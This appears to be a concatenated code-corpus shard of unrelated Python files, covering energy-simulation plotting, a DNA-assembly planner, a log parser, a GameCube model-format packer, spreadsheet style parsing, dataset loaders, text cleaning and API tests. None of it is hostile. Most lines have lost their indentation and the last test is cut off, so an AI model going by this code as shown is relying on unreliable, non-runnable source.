#scatterCorrelation(runs_inputs[['WeekdayLandPsched_Offset']], runs_outputs[['Cooling']]/floor_area, input_label='L&P profile offset (per 30Min)', output_label='Cooling $\mathregular{(kWh/m^{2}a)}$', DataPathImages)
boxplotPredictions(runs_outputs/floor_area, time_step, DataPathImages)
plt.show()
def calculateCorrelations(DataPath_model_real, X_real, Y_real, cols_outputs, cols_inputs):
cols_outputs.append('Total')
Y_real = pd.DataFrame(pd.concat([pd.DataFrame(Y_real), pd.DataFrame(Y_real.sum(axis=1), columns=['Total'])], axis=1))
Y_real = Y_real.as_matrix()
print('no. variables', len(cols_inputs))
print('cols_outputs', cols_outputs)
label = ['Standardized', 'Spearman', 'Pearson']
for p, q in enumerate(label):
df_corr = pd.DataFrame(cols_inputs)
df_corr.columns = [q]
for j in range(Y_real.shape[1]):
coef_list = []
for i in range(X_real.shape[1]):
if p == 0:
# coef_list.append(sm.OLS(zscore(X_real[:, i]), zscore(Y_real.iloc[:, j])).fit().params[0])
#print('install statsmodels')
continue
elif p == 1:
coef_list.append(spearmanr(X_real[:, i], Y_real[:, j])[0])
elif p == 2:
coef_list.append(pearsonr(X_real[:, i], Y_real[:, j])[0])
df_corr[cols_outputs[j]] = pd.Series(coef_list) # append list to df
df_corr.set_index(q, inplace=True)
if p == 0:
df_corr_stnd = df_corr
elif p == 1:
df_corr_spearman = df_corr
elif p == 2:
df_corr_pearson = df_corr
return df_corr_stnd, df_corr_spearman, df_corr_pearson
def scatterCorrelation(df_inputs, df_outputs, input_label, output_label, DataPathImages):
df_in = df_inputs.columns.tolist()
df_out = df_outputs.columns.tolist()
for i, v in enumerate(range(len(df_in))):
input = df_inputs[df_in[i]]
output = df_outputs[df_out[i]]
fig = plt.figure(figsize=(6/ 2.54, 6 / 2.54))
ax = fig.add_subplot(111)
reorder = sorted(range(len(input)), key = lambda ii: input[ii])
xd = [input[ii] for ii in reorder]
yd = [output[ii] for ii in reorder]
par = np.polyfit(xd, yd, 1, full=True)
slope=par[0][0]
intercept=par[0][1]
xl = [min(xd), max(xd)]
yl = [slope*xx + intercept for xx in xl]
# coefficient of determination, plot text
variance = np.var(yd)
residuals = np.var([(slope*xx + intercept - yy) for xx,yy in zip(xd,yd)])
Rsqr = np.round(1-residuals/variance, decimals=2)
# error bounds
yerr = [abs(slope*xx + intercept - yy) for xx,yy in zip(xd,yd)]
par = np.polyfit(xd, yerr, 2, full=True)
yerrUpper = [(xx*slope+intercept)+(par[0][0]*xx**2 + par[0][1]*xx + par[0][2]) for xx,yy in zip(xd,yd)]
yerrLower = [(xx*slope+intercept)-(par[0][0]*xx**2 + par[0][1]*xx + par[0][2]) for xx,yy in zip(xd,yd)]
ax.plot(xl, yl, '-', color=colors[1])
ax.plot(xd, yerrLower, '--', color=colors[1])
ax.plot(xd, yerrUpper, '--', color=colors[1])
max_dots = 500
ax.scatter(df_inputs[df_in[i]][:max_dots], df_outputs[df_out[i]][:max_dots], alpha=.8)
#ax.plot(x, m*x + b, '-')
#ax.set_xlim(0, ),
ax.set_xlabel(input_label)
ax.set_ylabel(output_label)
ax.set_title('$R^2 = %0.2f$'% Rsqr, fontsize=9)
plt.savefig(DataPathImages + '_ScatterSingleVariable.png', dpi=300, bbox_inches='tight')
def boxplotPredictions(runs, time_step, DataPathImages): # for multiple runs
"""
:param runs: Pandas DataFrame of predictions (i.e. combined eplusmtr results)
:param time_step: 'month' or 'year'
:return:
"""
if time_step == 'year':
no_end_uses = len(runs.columns)
fig = plt.figure(figsize=(18 / 2.54, 8 / 2.54)) #width and height
ax2 = plt.subplot2grid((1, no_end_uses+1), (0, 0))
ax = plt.subplot2grid((1, no_end_uses+1), (0, 1), colspan=no_end_uses)
#plot end-uses boxplots
x = np.arange(1, len(runs.columns) + 1)
bplot = runs.iloc[:, :].plot.box(ax=ax, widths=.85, showfliers=False, patch_artist=True, return_type='dict') #showmeans=True
colors_repeat = list(itertools.chain.from_iterable(itertools.repeat(x, 2) for x in colors))
for y in range(runs.shape[0]):
if y < 250: # otherwise it gets too crowded
q = np.random.normal(0, 0.06, size=runs.shape[1])
ax.scatter(x+q, runs.iloc[y, :], edgecolors='r', alpha=0.05, zorder=5, facecolors='none',)
#plot total boxplot
bplot_ax2 = pd.DataFrame(runs.sum(axis=1), columns=['Total']).plot.box(ax=ax2, widths=.85, showfliers=False, patch_artist=True, return_type='dict', )
for y in range(pd.DataFrame(runs.sum(axis=1)).shape[0]):
if y < 500:
q = np.random.normal(0, 0.06)
ax2.scatter(1+q, pd.DataFrame(runs.sum(axis=1)).iloc[y, :], edgecolors='r', alpha=0.1, zorder=5, facecolors='none', )
bplots = [bplot, bplot_ax2]
for bplot in bplots:
[i.set(color=colors[0], linewidth=1.5) for i in bplot['boxes']]
[i.set(facecolor='white') for i in bplot['boxes']]
for key in ['whiskers', 'caps', 'medians']:
for y, box in enumerate(bplot[key]): #set colour of boxes
box.set(color=colors[0], linewidth=1.5)
[i.set(color='black') for i in bplot['medians']]
fig.subplots_adjust(wspace=1)
ax2.set_ylabel('Energy $\mathregular{(kWh/m^{2}a)}$')
ax.yaxis.grid(b=True, which='major', color='black', linestyle='--', alpha=.4)
ax2.yaxis.grid(b=True, which='major', color='black', linestyle='--', alpha=.4)
ax.set_axisbelow(True)
ax2.set_axisbelow(True)
if time_step == 'month':
cols = runs.columns.tolist()
runs_total = runs.sum(axis=1, level=[1]) # sum the months for each end-use
runs_total.columns = pd.MultiIndex.from_product([['Total'], runs_total.columns]) # add new level total and columns
runs = pd.concat([ runs, runs_total], axis=1) #add total to multiindex
print(runs.head())
end_uses = runs.columns.levels[0].tolist()
print(runs[end_uses[0]].columns)
month_list = runs[end_uses[0]].columns.tolist()
ticklabels=month_list
fig, axes = plt.subplots(nrows=len(end_uses), ncols=1, sharey=False, figsize=(18 / 2.54, len(end_uses)*3.5 / 2.54))
end_uses.remove('Total')
end_uses.append('Total') #total to end
for x, y in enumerate(end_uses):
ax = axes[x]
props = dict(boxes=colors[0], whiskers=colors[0], medians='black', caps=colors[0])
runs.xs(y, axis=1).plot.box(ax=ax, color=props, patch_artist=True, showfliers=False) # access highlevel multiindex
#hide month labels for all but last plot
ax.set_ylabel(y)
if x != len(end_uses)-1:
for index, label in enumerate(ax.get_xaxis().get_ticklabels()):
label.set_visible(False)
ax.yaxis.grid(b=True, which='major', color='black', linestyle='--', alpha=.4)
ax.set_axisbelow(True)
axes[0].set_title('Energy $\mathregular{(kWh/m^{2}a)}$', fontsize=9)
axes[len(end_uses)-1].xaxis.set_major_formatter(ticker.FixedFormatter(ticklabels))
plt.savefig(DataPathImages + time_step + '_boxplot.png', dpi=300, bbox_inches='tight')
def heatmapCorrelations(df, runs, DataPathImages):
df_perc_total = [i / runs.mean(axis=0).sum() for i in runs.mean(axis=0)]
df_perc_total.append(1) # for the total, which is 100%
runs = pd.DataFrame(pd.concat([runs, pd.DataFrame(runs.sum(axis=1), columns=['Total'])], axis=1))
cols_outputs = runs.columns.tolist()
df_standard = df.multiply(df_perc_total)
df_standard = (df_standard-df_standard.mean().mean()) / (df_standard.max().max() - df_standard.min().min())
df_index = df[abs(df[abs(df) > .25].count(axis=1) > 0.25)]
df_index_standard = df_standard[abs(df_standard[abs(df_standard) > .25].count(axis=1) > 0.25)]
def f7(seq):
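        # order-preserving de-duplication (keeps the first occurrence of each index)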
seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
df_index = f7(df_index.index.tolist()+df_index_standard.index.tolist())
df = df.loc[df_index]
df_standard = df_standard.loc[df_index]
cols_outputs_add = [v+' ['+str(round(df_perc_total[i]*100,1))+'%]' for i,v in enumerate(cols_outputs)]
heatmap = df.as_matrix(columns=cols_outputs)
fig, ax = plt.subplots(figsize=(10 / 2.54, 12 / 2.54))
use_sns = True
if use_sns is True:
ax = sns.heatmap(heatmap, linewidths=.8, annot=True, cmap='RdBu_r', annot_kws={"size": 6}, fmt='.2f', vmin=-1, vmax=1) #cmap=cm.Spectral_r,
ax.set_yticklabels(df.index, rotation=0) # set y labels ('variables') from index
ax.set_xticklabels(cols_outputs_add, rotation=90) # set y labels ('variables') from index
ax.xaxis.tick_top()
else:
im = ax.matshow(heatmap, cmap='RdBu_r', interpolation='none')
cbar = plt.colorbar(im, fraction=0.04555, pad=0.04)
cbar.ax.tick_params()
ind_x = np.arange(df.shape[1])
ind_y = np.arange(df.shape[0])
ax.set_aspect('equal')
ax.set_yticks(ind_y) # set positions for y-labels, .5 to put the labels in the middle
ax.set_yticklabels(df.index, rotation = 0) # set y labels ('variables') from index
ax.set_yticks(ind_y + .5, minor=True)
ax.set_xticklabels('')
ax.set_xticks(ind_x) # set positions for y-labels, .5 to put the labels in the middle
ax.set_xticklabels(cols_outputs_add, rotation=90) # set y labels ('variables') from index
ax.set_xticks(ind_x + .5, minor=True)
ax.grid(which='minor', linewidth=1, color='white')
ax.grid(False, which='major')
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['left'].set_visible(False)
# annotating the data inside the heatmap
for y in range(df.shape[0]):
for x in range(df.shape[1]):
plt.text(x, y, '%.2f' % heatmap[y][x],horizontalalignment='center',verticalalignment='center',fontsize=6)
plt.savefig(DataPathImages + '_HeatMapCorrelations.png', dpi=400, bbox_inches='tight')
if __name__ == '__main__':
def start__main__():
print('start')
start__main__()
from read_predictions import readRuns, readInputs
colors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#8c564b', '#d62728', '#9467bd', '#aec7e8', '#ffbb78', '#98df8a',
'#c49c94', '#ff9896', '#c5b0d5', '#1f77b4', '#ff7f0e', '#2ca02c', '#8c564b', '#d62728', '#9467bd',
'#aec7e8', '#ffbb78', '#98df8a', '#c49c94', '#ff9896', '#c5b0d5']
UserName = getpass.getuser()
if UserName == 'cvdronke':
start_path = 'C:/Users/' + UserName + '/'
else:
start_path = 'D:/'
main() |
498331 | def my_dir(obj):
return dir(obj)
class SingleClassInModule(object):
def __init__(self, prop):
raise NotImplementedError()
def not_implemented(self, param):
raise NotImplementedError()
|
498333 | from .grammaregex import match_tree, find_tokens, print_tree, verify_pattern, PatternSyntaxException
|
498349 | import testinfra
def test_service_is_running_and_enabled(Service):
kibana = Service('kibana')
assert kibana.is_running
assert kibana.is_enabled
|
498371 | from setuptools import setup, find_packages, Command
import os
setup(
name="pythonparser",
version="1.4",
author="whitequark",
author_email="<EMAIL>",
url="https://github.com/m-labs/pythonparser",
description="A Python parser intended for use in tooling",
long_description=open("README.md").read(),
license="MIT",
install_requires=["regex"],
extras_require={},
dependency_links=[],
packages=find_packages(exclude=["tests*"]),
namespace_packages=[],
test_suite="pythonparser.test",
package_data={},
ext_modules=[],
entry_points={},
)
|
498384 | import sys
from pathlib import Path
def set_api(key):
token_file = Path(__file__).parent.absolute() / "key"
token_file.write_text(key)
print("The API-token " + key + " was entered and saved.")
|
498397 | import dnaweaver as dw
import time
cheap_dna_offer = dw.CommercialDnaOffer(
name="CheapDNA.",
sequence_constraints=[
dw.NoPatternConstraint(enzyme="BsaI"),
dw.SequenceLengthConstraint(max_length=4000),
],
pricing=dw.PerBasepairPricing(0.10),
)
oligo_dna_offer = dw.CommercialDnaOffer(
name="OliGoo",
sequence_constraints=[
dw.GcContentConstraint(min_gc=0.3, max_gc=0.7),
dw.SequenceLengthConstraint(max_length=100),
],
pricing=dw.PerBasepairPricing(0.07),
memoize=True,
)
oligo_assembly_station = dw.DnaAssemblyStation(
name="Oligo Assembly Station",
assembly_method=dw.OligoAssemblyMethod(
overhang_selector=dw.TmSegmentSelector(
min_size=15, max_size=25, min_tm=50, max_tm=70
),
min_segment_length=40,
max_segment_length=200,
sequence_constraints=[dw.SequenceLengthConstraint(max_length=1500)],
duration=8,
cost=30,
),
supplier=oligo_dna_offer,
coarse_grain=20,
a_star_factor="auto",
memoize=True,
)
assembly_station = dw.DnaAssemblyStation(
name="Gibson Assembly Station",
assembly_method=dw.GibsonAssemblyMethod(
overhang_selector=dw.TmSegmentSelector(min_tm=55, max_tm=70),
min_segment_length=500,
max_segment_length=4000,
),
supplier=[cheap_dna_offer, oligo_assembly_station],
logger="bar",
coarse_grain=100,
fine_grain=10,
a_star_factor="auto",
)
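# The Gibson station can source every fragment either from CheapDNA. or from the oligo
# assembly station (which in turn orders its oligos from OliGoo); get_quote() below then
# searches over decompositions of the target sequence for the cheapest overall plan.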
print("Looking for the best assembly plan...")
t0 = time.time()
sequence = dw.random_dna_sequence(10000, seed=123)
quote = assembly_station.get_quote(sequence, with_assembly_plan=True)
print(quote.assembly_step_summary())
print("Finished in %.01d seconds" % (time.time() - t0))
|
498440 | import sys
import pandas as pd
import numpy as np
def add_info(df):
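    # appends four summary rows below the per-repetition results: a dashed separator,
    # the row with the best focus metric, the column means and the column stds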
k = df.columns
ks = [len(i) for i in k]
ks = max(ks)
focus = k[2]
focus_value = df[focus]
best_focus_value = max(focus_value)
best_row = df[df[focus] == best_focus_value]
n = len(df[k[0]])
idx = list(range(1,n+1)) + ['*'] + ['best'] +['ave'] + ['std']
best = {i:list(best_row[i])[0] for i in k}
ave = {i:np.mean(df[i]) for i in k}
std = df.std()
std = {i:std[i] for i in k}
sep = {i:'-'*(ks-1) for i in k}
    # DataFrame.append was removed in pandas 2.0; concatenate the summary rows instead
    df = pd.concat([df, pd.DataFrame([sep, best, ave, std], columns=k)])
df.index = idx
return df
print('type focus_0: [val/test/dev/step]')
f0 = sys.stdin.readline().strip()
print('file dir')
file_dir = sys.stdin.readline().strip()
file_dir += '/job.log.0'
with open(file_dir, 'r') as f:
logs = []
for l in f:
logs.append(l.strip())
mem = []
if f0 == 'val':
f0s = 'dev'
else:
f0s = f0[:]
for l in logs:
if l.startswith('batch_size:'):
mem.append({'{0}'.format(f0):[], 'test':[]})
elif l.startswith('[{0} evaluation] '.format(f0s)):
mem[-1]['{0}'.format(f0)].append(float(l.split('] ')[1].split(', ')[0].split(': ')[1]))
elif l.startswith('[test evaluation] '):
mem[-1]['test'].append(float(l.split('] ')[1].split(', ')[0].split(': ')[1]))
lib = {'loc':[], 'best_test_auc':[], 'best_{0}_auc'.format(f0):[]}
for rep in mem:
#for rec in range(len(rep['test'])):
full_test_times = len(rep['test'])
best_loc = np.argmax(rep['{0}'.format(f0)])
    best_focus = rep['{0}'.format(f0)][best_loc]
best_test = rep['test'][best_loc]
#lib['loc'].append('{0}/{1}'.format(best_loc, len(rep['test'])))
lib['loc'].append(best_loc)
lib['best_test_auc'].append(best_test)
    lib['best_{0}_auc'.format(f0)].append(best_focus)
lib = pd.DataFrame(lib)
lib = add_info(lib)
k = list(lib['loc'])
full_rep_times = len(mem)
for i in range(len(k)):
if i < full_rep_times or i in (full_rep_times+1, full_rep_times+2):
k[i] = '{0}/{1}'.format(k[i], full_test_times-1)
lib['loc'] = k
print(lib)
|
498462 | import numpy
from btypes.big_endian import *
import gx
import logging
logger = logging.getLogger(__name__)
class Header(Struct):
magic = ByteString(4)
section_size = uint32
shape_count = uint16
__padding__ = Padding(2)
shape_offset = uint32
index_offset = uint32
unknown0_offset = uint32
attribute_descriptor_offset = uint32
matrix_index_offset = uint32
packet_offset = uint32
matrix_selection_offset = uint32
packet_location_offset = uint32
def __init__(self):
self.magic = b'SHP1'
@classmethod
def unpack(cls, stream):
header = super().unpack(stream)
if header.magic != b'SHP1':
raise FormatError(f'invalid magic: {header.magic}')
if header.unknown0_offset != 0:
logger.warning('unexpected unknown0_offset value: %s', header.unknown0_offset)
return header
class AttributeDescriptor(Struct):
"""Arguments to GXSetVtxDesc."""
attribute = EnumConverter(uint32, gx.Attribute)
input_type = EnumConverter(uint32, gx.InputType)
def __init__(self, attribute, input_type):
self.attribute = attribute
self.input_type = input_type
class AttributeDescriptorList(TerminatedList):
element_type = AttributeDescriptor
terminator_value = element_type(gx.VA_NULL, gx.NONE)
@staticmethod
def terminator_predicate(element):
return element.attribute == gx.VA_NULL
class MatrixSelection(Struct):
unknown0 = uint16 # position/normal matrix for texture matrices? noclip.website: use matrix index
count = uint16
first = uint32
class PacketLocation(Struct):
size = uint32
offset = uint32
class Primitive:
def __init__(self, primitive_type, vertices):
self.primitive_type = primitive_type
self.vertices = vertices
class Batch:
def __init__(self, primitives, matrix_table, unknown0):
self.primitives = primitives
self.matrix_table = matrix_table
self.unknown0 = unknown0
class Shape(Struct):
transformation_type = uint8
__padding__ = Padding(1)
batch_count = uint16
attribute_descriptor_offset = uint16
first_matrix_selection = uint16
first_packet = uint16
__padding__ = Padding(2)
bounding_radius = float32
min_x = float32
min_y = float32
min_z = float32
max_x = float32
max_y = float32
max_z = float32
def __init__(self):
self.transformation_type = 0
@classmethod
def pack(cls, stream, shape):
shape.batch_count = len(shape.batches)
super().pack(stream, shape)
def get_attribute_type(attribute_descriptor):
if attribute_descriptor.input_type == gx.INDEX8:
return numpy.uint8
if attribute_descriptor.input_type == gx.INDEX16:
return numpy.uint16
if attribute_descriptor.input_type == gx.DIRECT:
if attribute_descriptor.attribute == gx.VA_PTNMTXIDX:
return numpy.uint8
if attribute_descriptor.attribute in gx.VA_TEXMTXIDX:
return numpy.uint8
raise ValueError(f'invalid direct attribute: {attribute_descriptor.attribute}')
raise ValueError(f'invalid input type: {attribute_descriptor.input_type}')
def get_vertex_type(attribute_descriptors):
return numpy.dtype([
(descriptor.attribute.name, get_attribute_type(descriptor))
for descriptor in attribute_descriptors
]).newbyteorder('>')
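# Each packet is a GX display-list fragment: a primitive is stored as a one-byte
# primitive type opcode followed by a big-endian uint16 vertex count and the packed
# vertex data; the packet is padded to a 0x20-byte boundary with 0x00 (NOP) bytes.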
def pack_packet(stream, primitives):
for primitive in primitives:
uint8.pack(stream, primitive.primitive_type)
uint16.pack(stream, len(primitive.vertices))
primitive.vertices.tofile(stream)
align(stream, 0x20, b'\x00')
def unpack_packet(stream, vertex_type, size):
# The entire packet is read into memory at once to improve performance
packet = stream.read(size)
primitives = []
i = 0
while i < size:
opcode = packet[i]
if opcode == 0x00:
i += 1
continue
primitive_type = gx.PrimitiveType(opcode)
vertex_count = uint16.unpack_from(packet, i + 1)
vertices = numpy.frombuffer(packet, vertex_type, vertex_count, i + 3)
primitives.append(Primitive(primitive_type, vertices))
i += 3 + vertex_count*vertex_type.itemsize
return primitives
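# Haystack is a minimal dict-like container backed by parallel key/value lists; lookups
# use equality rather than hashing, so unhashable keys (the attribute descriptor lists
# deduplicated in pack() below) can be used.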
class Haystack:
def __init__(self):
self.keys = []
self.values = []
def __getitem__(self, key):
try:
index = self.keys.index(key)
except ValueError:
raise KeyError(key)
return self.values[index]
def __setitem__(self, key, value):
try:
index = self.keys.index(key)
except ValueError:
self.keys.append(key)
self.values.append(value)
else:
self.values[index] = value
def __contains__(self, key):
return key in self.keys
def pack(stream, shapes):
base = stream.tell()
header = Header()
header.shape_count = len(shapes)
stream.write(b'\x00'*Header.sizeof())
header.shape_offset = stream.tell() - base
stream.write(b'\x00'*Shape.sizeof()*len(shapes))
header.index_offset = stream.tell() - base
for index in range(len(shapes)):
uint16.pack(stream, index)
align(stream, 4)
header.unknown0_offset = 0
align(stream, 0x20)
header.attribute_descriptor_offset = stream.tell() - base
deduplicate_table = Haystack()
for shape in shapes:
if shape.attribute_descriptors not in deduplicate_table:
offset = stream.tell() - base - header.attribute_descriptor_offset
deduplicate_table[shape.attribute_descriptors] = offset
AttributeDescriptorList.pack(stream, shape.attribute_descriptors)
shape.attribute_descriptor_offset = deduplicate_table[shape.attribute_descriptors]
matrix_indices = []
matrix_selections = []
for shape in shapes:
shape.first_matrix_selection = len(matrix_selections)
for batch in shape.batches:
matrix_selection = MatrixSelection()
matrix_selection.unknown0 = batch.unknown0
matrix_selection.first = len(matrix_indices)
matrix_selection.count = len(batch.matrix_table)
matrix_indices.extend(batch.matrix_table)
matrix_selections.append(matrix_selection)
header.matrix_index_offset = stream.tell() - base
for matrix_index in matrix_indices:
uint16.pack(stream, matrix_index)
align(stream, 0x20)
header.packet_offset = stream.tell() - base
packet_locations = []
for shape in shapes:
shape.first_packet_location = len(packet_locations)
for batch in shape.batches:
offset = stream.tell()
pack_packet(stream, batch.primitives)
packet_location = PacketLocation()
packet_location.offset = offset - header.packet_offset - base
packet_location.size = stream.tell() - offset
packet_locations.append(packet_location)
header.matrix_selection_offset = stream.tell() - base
for matrix_selection in matrix_selections:
MatrixSelection.pack(stream, matrix_selection)
header.packet_location_offset = stream.tell() - base
for packet_location in packet_locations:
PacketLocation.pack(stream, packet_location)
align(stream, 0x20)
header.section_size = stream.tell() - base
stream.seek(base)
Header.pack(stream, header)
stream.seek(base + header.shape_offset)
for shape in shapes:
Shape.pack(stream, shape)
stream.seek(base + header.section_size)
def unpack(stream):
base = stream.tell()
header = Header.unpack(stream)
stream.seek(base + header.shape_offset)
shapes = [Shape.unpack(stream) for _ in range(header.shape_count)]
stream.seek(base + header.index_offset)
for index in range(header.shape_count):
if index != uint16.unpack(stream):
raise FormatError('invalid index')
duplicate_table = {}
for shape in shapes:
offset = base + header.attribute_descriptor_offset + shape.attribute_descriptor_offset
if offset not in duplicate_table:
stream.seek(offset)
attribute_descriptors = AttributeDescriptorList.unpack(stream)
duplicate_table[offset] = attribute_descriptors
shape.attribute_descriptors = duplicate_table[offset]
stream.seek(base + header.matrix_selection_offset)
count = max(shape.first_matrix_selection + shape.batch_count for shape in shapes)
matrix_selections = [MatrixSelection.unpack(stream) for _ in range(count)]
stream.seek(base + header.matrix_index_offset)
count = max(selection.first + selection.count for selection in matrix_selections)
matrix_indices = [uint16.unpack(stream) for _ in range(count)]
stream.seek(base + header.packet_location_offset)
count = max(shape.first_packet + shape.batch_count for shape in shapes)
packet_locations = [PacketLocation.unpack(stream) for _ in range(count)]
for shape in shapes:
vertex_type = get_vertex_type(shape.attribute_descriptors)
shape.batches = [None]*shape.batch_count
for i in range(shape.batch_count):
matrix_selection = matrix_selections[shape.first_matrix_selection + i]
matrix_table = matrix_indices[matrix_selection.first : matrix_selection.first + matrix_selection.count]
packet_location = packet_locations[shape.first_packet + i]
stream.seek(base + header.packet_offset + packet_location.offset)
primitives = unpack_packet(stream, vertex_type, packet_location.size)
shape.batches[i] = Batch(primitives, matrix_table, matrix_selection.unknown0)
stream.seek(base + header.section_size)
return shapes
|
498484 | import os
from . import recordtypes as rt
from .recordreader import RecordReader
from .records import FormatRecord
class Format(object):
__slots__ = ('code', 'is_builtin', '_is_date_format')
def __init__(self, code):
self.code = code
self.is_builtin = False
self._is_date_format = None
@property
def is_date_format(self):
if self._is_date_format is None:
self._is_date_format = False
if self.code is not None:
# TODO Implement an actual parser
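                # heuristic: characters inside [brackets] (colour/condition sections) are skipped;
                # any y/m/d/h/s character outside brackets marks the code as a date format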
in_color = 0
for c in self.code:
if c == '[':
in_color += 1
elif c == ']' and in_color > 0:
in_color -= 1
elif in_color > 0:
continue
elif c in ('y', 'm', 'd', 'h', 's'):
self._is_date_format = True
break
return self._is_date_format
def __repr__(self):
return 'Format(code={}, is_builtin={})' \
.format(self.code, self.is_builtin)
class BuiltinFormat(Format):
__slots__ = ()
def __init__(self, *args, **kwargs):
super(BuiltinFormat, self).__init__(*args, **kwargs)
self.is_builtin = True
class Styles(object):
_general_format = BuiltinFormat(None)
# See: ISO/IEC29500-1:2016 section 18.8.30
_builtin_formats = {
1: BuiltinFormat('0'),
2: BuiltinFormat('0.00'),
3: BuiltinFormat('#,##0'),
4: BuiltinFormat('#,##0.00'),
9: BuiltinFormat('0%'),
10: BuiltinFormat('0.00%'),
11: BuiltinFormat('0.00E+00'),
12: BuiltinFormat('# ?/?'),
13: BuiltinFormat('# ??/??'),
14: BuiltinFormat('mm-dd-yy'),
15: BuiltinFormat('d-mmm-yy'),
16: BuiltinFormat('d-mmm'),
17: BuiltinFormat('mmm-yy'),
18: BuiltinFormat('h:mm AM/PM'),
19: BuiltinFormat('h:mm:ss AM/PM'),
20: BuiltinFormat('h:mm'),
21: BuiltinFormat('h:mm:ss'),
22: BuiltinFormat('m/d/yy h:mm'),
37: BuiltinFormat('#,##0;(#,##0)'),
38: BuiltinFormat('#,##0;[Red](#,##0)'),
39: BuiltinFormat('#,##0.00;(#,##0.00)'),
40: BuiltinFormat('#,##0.00;[Red](#,##0.00)'),
45: BuiltinFormat('mm:ss'),
46: BuiltinFormat('[h]:mm:ss'),
47: BuiltinFormat('mmss.0'),
48: BuiltinFormat('##0.0E+0'),
49: BuiltinFormat('@')
}
def __init__(self, fp):
self._fp = fp
self._parse()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def _parse(self):
self._formats = dict()
self._cell_style_xfs = list()
self._cell_xfs = list()
self._fp.seek(0, os.SEEK_SET)
reader = RecordReader(self._fp)
for rectype, rec in reader:
if rectype == rt.FMT:
self._formats[rec.fmtId] = Format(rec.fmtCode)
elif rectype == rt.BEGIN_CELL_STYLE_XFS:
self._cell_style_xfs = [None] * rec.count
i = 0
for rectype, rec in reader:
if rectype == rt.XF:
self._cell_style_xfs[i] = rec
i += 1
elif rectype == rt.END_CELL_STYLE_XFS:
break
elif rectype == rt.BEGIN_CELL_XFS:
self._cell_xfs = [None] * rec.count
i = 0
for rectype, rec in reader:
if rectype == rt.XF:
self._cell_xfs[i] = rec
i += 1
elif rectype == rt.END_CELL_XFS:
break
elif rectype == rt.END_STYLE_SHEET:
break
def get_style(self, idx):
# TODO
del idx
def _get_format(self, idx):
if idx < len(self._cell_xfs):
fmt_id = self._cell_xfs[idx].numFmtId
if fmt_id in self._formats:
return self._formats[fmt_id]
elif fmt_id in self._builtin_formats:
return self._builtin_formats[fmt_id]
return self._general_format
def close(self):
self._fp.close()
|
498543 | import json
import os
import random
from torch.utils.data import Dataset
from PIL import Image
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
Image.MAX_IMAGE_PIXELS = None
from data.utils import pre_caption
import os,glob
class pretrain_dataset(Dataset):
def __init__(self, ann_file, laion_path, transform):
self.ann_pretrain = []
for f in ann_file:
print('loading '+f)
ann = json.load(open(f,'r'))
self.ann_pretrain += ann
self.laion_path = laion_path
if self.laion_path:
self.laion_files = glob.glob(os.path.join(laion_path,'*.json'))
print('loading '+self.laion_files[0])
with open(self.laion_files[0],'r') as f:
self.ann_laion = json.load(f)
self.annotation = self.ann_pretrain + self.ann_laion
else:
self.annotation = self.ann_pretrain
self.transform = transform
def reload_laion(self, epoch):
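        # cycle through the laion shard files, loading a different json shard each epoch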
n = epoch%len(self.laion_files)
print('loading '+self.laion_files[n])
with open(self.laion_files[n],'r') as f:
self.ann_laion = json.load(f)
self.annotation = self.ann_pretrain + self.ann_laion
def __len__(self):
return len(self.annotation)
def __getitem__(self, index):
ann = self.annotation[index]
image = Image.open(ann['image']).convert('RGB')
image = self.transform(image)
caption = pre_caption(ann['caption'],30)
return image, caption |
498547 | class AmazonEvalF(object):
PROD_ID = 'prod_id'
CAT = 'cat'
REV1 = 'rev1'
REV2 = 'rev2'
REV3 = 'rev3'
REV4 = 'rev4'
REV5 = 'rev5'
REV6 = 'rev6'
REV7 = 'rev7'
REV8 = 'rev8'
SUMM1 = 'summ1'
SUMM2 = 'summ2'
SUMM3 = 'summ3'
REVS = [REV1, REV2, REV3, REV4, REV5, REV6, REV7, REV8]
|
498566 | import re
"""
Load all cleaned text files from wikipedia and convert them to clean
line by line sentences text.
"""
# based on a histogram of the output, 50 time steps for the LSTM would be a good choice
# input location of text files
input_file = 'data/raw.en/englishText_'
# output location
output_file = 'data/wiki_sentences'
# refers to the first file in the input location
start_file_index = 0
# step size in the name of text file
step = 10000
# Token to replace all integers inside the text
dig_token = "$DGT$"
# pattern to find the digit numbers
dig_pattern = r'\b[0-9]*\.*[0-9]+\b'
# loop over all 154 text files
for i in range(0, 154):
# hold text to write to new file
data = ""
# concatenate file name with step size
input_filename = input_file + str(start_file_index) + '_' + str(start_file_index + step)
# output filename
output_filename = output_file + str(i) + '.txt'
# increase start_file_index for next loop
start_file_index += step
print("reading: " + input_filename)
with open(input_filename, mode="r", encoding="latin-1") as f:
# lines here are paragraphs in Wikipedia
for line in f:
line = " ".join(line.split())
words = line.split(' ')
# if this paragraph is shorter than 10 words, go to next paragraph
if len(words) < 10:
continue
# remove <doc id... produced by WikiExtractor
if words[0] == '<doc':
continue
# divide paragraph to sentences
            pattern = r'(\w\w..\.\ )'
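            # the pattern matches two word characters, any two characters, a period and a space;
            # the trailing space of each match (index m[1]-1) is replaced with '\n' below to end the sentence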
indexes = re.finditer(pattern, line)
line = list(line)
for j in indexes:
m = j.span()
line[m[1]-1] = '\n'
line = ''.join(line)
# replace digits with $DGT$
line = re.sub(dig_pattern, dig_token, line)
data += line + '\n'
out_file = open(output_filename, mode="w")
out_file.write(data)
out_file.close()
|
498568 | import pytest
from httpx import AsyncClient
from main import app
from dotenv import load_dotenv
from services.helpers.alena import cleaning_service
from pathlib import Path
import os
import sys
load_dotenv()
headers = {
'Authorization': 'Bearer {}'.format(os.environ.get('FILE_MANAGER_BEARER_TOKEN'))
}
_ORIGINAL_IMAGE = open('api/app/static/pictures/original/dcb8ac79618540688ea36e688a8c3635.png', 'rb')
_ORIGINAL_IMAGE_NAME = 'dcb8ac79618540688ea36e688a8c3635.png'
@pytest.mark.asyncio
async def test_root():
params = {'cpu_load': 'True'}
async with AsyncClient(app=app, base_url=os.environ.get('API_URL'), headers=headers, params=params) as ac:
response = await ac.get("/")
if params.get('cpu_load') != 'True':
assert response.json() == {"Hello": "Token is True"}
assert response.status_code == 200
@pytest.mark.asyncio
async def test_upload_image_file():
params = {'thumbnail': 'True'}
image_file = {'file': (_ORIGINAL_IMAGE_NAME, _ORIGINAL_IMAGE, 'image/png')}
async with AsyncClient(app=app, base_url=os.environ.get('API_URL'), headers=headers, params=params) as ac:
